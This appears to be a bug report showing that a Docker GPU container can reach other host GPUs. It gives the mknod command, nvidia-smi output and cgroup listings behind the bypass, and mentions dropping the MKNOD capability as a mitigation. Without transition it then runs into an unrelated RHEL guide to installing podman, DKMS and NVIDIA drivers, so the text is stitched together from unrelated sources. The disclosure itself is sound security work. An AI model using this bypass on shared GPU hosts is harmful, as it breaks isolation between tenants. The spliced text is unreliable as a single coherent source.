
GPU container can gain access to other GPUs on the host

1. Issue description

A GPU container can break device isolation and gain access to other GPUs on the host.

2. Steps to reproduce the issue

Start a GPU container with only GPU 0 (/dev/nvidia0) attached:

$ docker run -it -e NVIDIA_VISIBLE_DEVICES=0  nvidia/cuda:10.1-runtime-ubuntu16.04 bash

The container can access GPU 0 as expected:

root@5f0921a756de:/# nvidia-smi
Wed Nov  4 07:50:56 2020
+-----------------------------------------------------------------------------+
| NVIDIA-SMI 450.51.05    Driver Version: 450.51.05    CUDA Version: 11.0     |
|-------------------------------+----------------------+----------------------+
| GPU  Name        Persistence-M| Bus-Id        Disp.A | Volatile Uncorr. ECC |
| Fan  Temp  Perf  Pwr:Usage/Cap|         Memory-Usage | GPU-Util  Compute M. |
|                               |                      |               MIG M. |
|===============================+======================+======================|
|   0  Tesla V100-PCIE...  Off  | 00000000:02:00.0 Off |                    0 |
| N/A   26C    P0    23W / 250W |      0MiB / 32510MiB |      0%      Default |
|                               |                      |                  N/A |
+-------------------------------+----------------------+----------------------+

+-----------------------------------------------------------------------------+
| Processes:                                                                  |
|  GPU   GI   CI        PID   Type   Process name                  GPU Memory |
|        ID   ID                                                   Usage      |
|=============================================================================|
|  No running processes found                                                 |
+-----------------------------------------------------------------------------+

The device cgroup whitelist entry c 195:0 rw is also as expected:

root@5f0921a756de:/# cat /sys/fs/cgroup/devices/devices.list
c 1:5 rwm
c 1:3 rwm
c 1:9 rwm
c 1:8 rwm
c 5:0 rwm
c 5:1 rwm
c *:* m
b *:* m
c 1:7 rwm
c 136:* rwm
c 5:2 rwm
c 10:200 rwm
c 195:255 rw
c 236:0 rw
c 236:1 rw
c 195:0 rw

BUT
if I create another GPU device file using GPU 0's major/minor numbers, something unexpected happens.

root@5f0921a756de:/# mknod -m 666 /dev/nvidia1 c 195 0

The /dev/nvidia1 node, with nvidia0's device number, is created successfully:

root@5f0921a756de:/# ll /dev/nvidia*
crw-rw-rw- 1 root root 236,   0 Oct  9 01:33 /dev/nvidia-uvm
crw-rw-rw- 1 root root 236,   1 Oct  9 01:33 /dev/nvidia-uvm-tools
crw-rw-rw- 1 root root 195,   0 Oct  9 01:32 /dev/nvidia0
crw-rw-rw- 1 root root 195,   0 Nov  4 08:15 /dev/nvidia1
crw-rw-rw- 1 root root 195, 255 Oct  9 01:32 /dev/nvidiactl

GPU 1 is now unexpectedly listed by nvidia-smi:

root@5f0921a756de:/# nvidia-smi
Wed Nov  4 08:20:45 2020
+-----------------------------------------------------------------------------+
| NVIDIA-SMI 450.51.05    Driver Version: 450.51.05    CUDA Version: 11.0     |
|-------------------------------+----------------------+----------------------+
| GPU  Name        Persistence-M| Bus-Id        Disp.A | Volatile Uncorr. ECC |
| Fan  Temp  Perf  Pwr:Usage/Cap|         Memory-Usage | GPU-Util  Compute M. |
|                               |                      |               MIG M. |
|===============================+======================+======================|
|   0  Tesla V100-PCIE...  Off  | 00000000:02:00.0 Off |                    0 |
| N/A   26C    P0    23W / 250W |      0MiB / 32510MiB |      0%      Default |
|                               |                      |                  N/A |
+-------------------------------+----------------------+----------------------+
|   1  Tesla V100-PCIE...  Off  | 00000000:03:00.0 Off |                    0 |
| N/A   29C    P0    25W / 250W |      0MiB / 32510MiB |      0%      Default |
|                               |                      |                  N/A |
+-------------------------------+----------------------+----------------------+

+-----------------------------------------------------------------------------+
| Processes:                                                                  |
|  GPU   GI   CI        PID   Type   Process name                  GPU Memory |
|        ID   ID                                                   Usage      |
|=============================================================================|
|  No running processes found                                                 |
+-----------------------------------------------------------------------------+

And the device cgroup whitelist doesn't change at all:

root@5f0921a756de:/# cat /sys/fs/cgroup/devices/devices.list
c 1:5 rwm
c 1:3 rwm
c 1:9 rwm
c 1:8 rwm
c 5:0 rwm
c 5:1 rwm
c *:* m
b *:* m
c 1:7 rwm
c 136:* rwm
c 5:2 rwm
c 10:200 rwm
c 195:255 rw
c 236:0 rw
c 236:1 rw
c 195:0 rw

I have run a TensorFlow demo in the container, and both GPUs can indeed be used.
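
For reference, a quick way to check what a framework sees from inside the container (assuming TensorFlow 2.x is installed, which is not part of the base image above) is:

root@5f0921a756de:/# python3 -c "import tensorflow as tf; print(tf.config.list_physical_devices('GPU'))"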

This problem can be avoided by adding --cap-drop MKNOD to docker run, but Docker containers have the MKNOD capability by default.
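
For example, starting the same container without the MKNOD capability makes the mknod call above fail with "Operation not permitted" (a sketch of the mitigation, using the same image as before):

$ docker run -it --cap-drop MKNOD -e NVIDIA_VISIBLE_DEVICES=0 nvidia/cuda:10.1-runtime-ubuntu16.04 bash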

It seems this operation can trick the device cgroup into granting access to other GPUs on the host.

It’s a big risk.

Host Preparation
First, install the necessary container tools to run containers on the host.

yum -y install podman
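
A quick sanity check that the container tooling is in place:

podman --version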

NVIDIA Driver Installation
NVIDIA drivers for RHEL must be installed on the host as a prerequisite for using GPUs in containers with podman. Let’s prepare the host by installing NVIDIA drivers and NVIDIA container enablement. See the install guide here.

NVIDIA drivers need to be compiled for the kernel in use. The build process requires the kernel-devel package to be installed.

yum -y install kernel-devel-$(uname -r) kernel-headers-$(uname -r)
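
Since the driver build fails if the headers do not match the running kernel, it is worth confirming that the installed packages correspond to the output of uname -r (a simple sanity check):

rpm -q kernel-devel-$(uname -r) kernel-headers-$(uname -r)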

The NVIDIA driver installation requires the DKMS package. DKMS is not supported or packaged by Red Hat. Work is underway to improve the packaging of NVIDIA drivers for Red Hat Enterprise Linux. DKMS can be installed from the EPEL repository.

First, install the EPEL repository. To install EPEL with DKMS on RHEL 7

yum -y install https://dl.fedoraproject.org/pub/epel/epel-release-latest-7.noarch.rpm

yum -y install dkms

To install EPEL with DKMS on RHEL 8

yum -y install https://dl.fedoraproject.org/pub/epel/epel-release-latest-8.noarch.rpm

yum -y install dkms

The newest NVIDIA drivers are located in the following repository. To install the CUDA 10.2 repository on RHEL 7

yum -y install http://developer.download.nvidia.com/compute/cuda/repos/rhel7/x86_64/cuda-repo-rhel7-10.2.89-1.x86_64.rpm

To install the CUDA 10.2 repository on RHEL 8

yum -y install http://developer.download.nvidia.com/compute/cuda/repos/rhel8/x86_64/cuda-repo-rhel8-10.2.89-1.x86_64.rpm

Remove the nouveau kernel module (otherwise the nvidia kernel module will not load). The installation of the NVIDIA driver package will blacklist the driver on the kernel command line (nouveau.modeset=0 rd.driver.blacklist=nouveau video=vesa:off), so that the nouveau driver will not be loaded on subsequent reboots.

modprobe -r nouveau
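
To confirm that nouveau is really gone before loading the NVIDIA module (the command should print nothing):

lsmod | grep nouveau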

There are many CUDA tools and libraries. You can install the entire CUDA stack on the bare-metal system.

yum -y install cuda

Or, you can be more selective and install only the necessary device drivers.

yum -y install xorg-x11-drv-nvidia xorg-x11-drv-nvidia-devel kmod-nvidia-latest-dkms

Load the NVIDIA and the unified memory kernel modules.

nvidia-modprobe && nvidia-modprobe -u
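
A quick check that the modules are loaded and the device nodes exist:

lsmod | grep nvidia
ls -l /dev/nvidia*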

Verify that the installation and the drivers are working on the host system.

nvidia-smi --query-gpu=gpu_name --format=csv,noheader --id=0 | sed -e 's/ /-/g'

Tesla-V100-SXM2-16GB
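
With the driver verified and the NVIDIA container enablement from the install guide in place (the OCI hook package, not covered above), a first GPU test in a container could look like the following; the image tag and hooks directory are assumptions based on common defaults, not part of the steps above:

podman run --rm --security-opt=label=disable --hooks-dir=/usr/share/containers/oci/hooks.d nvidia/cuda:10.2-base nvidia-smi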